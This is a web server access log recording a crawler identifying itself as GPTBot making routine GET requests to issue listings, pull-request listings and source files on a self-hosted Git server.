"/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 122707] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11301] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:19:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10085] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10089] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10254] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10257] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11213] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:19:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12023] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12023] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:19:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=open&type=all" -[17/Feb/2026:19:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 69130] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:19:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=open&type=all" -[17/Feb/2026:19:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=open&type=all" -[17/Feb/2026:19:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=all&type=all" -[17/Feb/2026:19:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:19:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15164] [Gzip 4.65] 